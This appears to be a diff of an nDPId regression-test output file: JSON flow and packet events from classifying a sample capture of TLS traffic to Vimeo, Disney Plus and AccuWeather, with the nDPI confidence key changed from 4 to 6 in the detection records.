00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1631088115362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115362,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8aylAAEAG8xTAqAGAx+hSbbaEAbsR7WhdAAAAAKAC+vCzrwAAAgQFtAQCCAqzLdcpAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADQGaj7H6FJtwKgBgAG7toQ\/rdv6Ee1oXqAS\/\/\/HZwAAAgQFTAQCCApg6mr7sy3XKQEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631088115376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0aypAAEAG8xvAqAGAx+hSbbaEAbsR7WheP63b+4AQAfbzyQAAAQEICrMt1zdg6mr7"} 
-00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} 
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":256,"packets-processed":255,"total-skipped-flows":0,"total-l4-payload-len":113664,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":7,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1637349011376} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637349011376,"flow_last_seen":1637349011376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637349011376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1637349011376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TGJAAEAGkyTAqAGAj8wJQb8WAbs5hVBVAAAAAKAC+vA+\/wAAAgQFtAQCCAoHfmCrAAAAAAEDAww="} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1637349011393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011393,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8T5MAAPMGHPOPzAlBwKgBgAG7vxa2dgKJOYVQVqASBZSQpgAAAgQFoAQCCArIQyJ4B35gqwEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1637349011393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637349011393,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0TGNAAEAGkyvAqAGAj8wJQb8WAbs5hVBWtnYCioAQABDE0gAAAQEICgd+YL3IQyJ4"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":285,"packets-processed":284,"total-skipped-flows":0,"total-l4-payload-len":121431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":8,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1642584017659} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642584017659,"flow_last_seen":1642584017659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642584017659,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642584017659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017659,"pkt":"CL6sCxdumt9Y+uvcCABFAAA8EtFAAEAG2zrAqAypFwxoU5lQAbvzO0RFAAAAAKAC\/\/9KaQAAAgQFtAQCCApYVYYCAAAAAAEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642584017680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017680,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAADcG9wsXDGhTwKgMqQG7mVB1nT8a8ztERqAS\/ojzIwAAAgQFtAQCCAqw3vMWWFWGAgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642584017681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642584017681,"pkt":"CL6sCxdumt9Y+uvcCABFAAA0EtJAAEAG20HAqAypFwxoU5lQAbvzO0RGdZ0\/G4AQAKwfuAAAAQEIClhVhhew3vMW"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":315,"packets-processed":314,"total-skipped-flows":0,"total-l4-payload-len":128021,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":66,"global_ts_msec":1643355518166} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1643355518166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1643355518166,"pkt":"pJGxgjQ5SKRyNpegCABFAAT+PElAAIARThnAqAF72DrRLubeAbsE6urRwAAAAAEIZ7HskbOWr9QAAETQNKtjIjiCXCI+9vqBWPy31G7jDH4RlwYv0XhaWuj0UrdcSVWZIrVwzwDrJa8dEWOeUvaAw7BXeYev6bi8Nu9Z4LWOvt0+XPgNkeHB6PvaZ9N4cpB1UIRx6byg5QljaxCkgdia5\/WZz2yX\/TayWJG0egLwFK4DYqDDADilA59ewmPTSu6+F3\/EVfKw86o2Yio5HeQqtUOtEdw6pRwxBehgjTrZf0PMuk40XDPug94YB\/sEApD8Ghq1zUUVofn\/jZoji68n+CZ74BkmZ8LSaemosx3Vm7YV3yQUauQU4lBHNM2XdkooJSDGv9YINXu8hmpHdW\/1encLGdPSyOJC8itWve1maDbUaMRhrbQrpaAPeVfgND5alDCN2D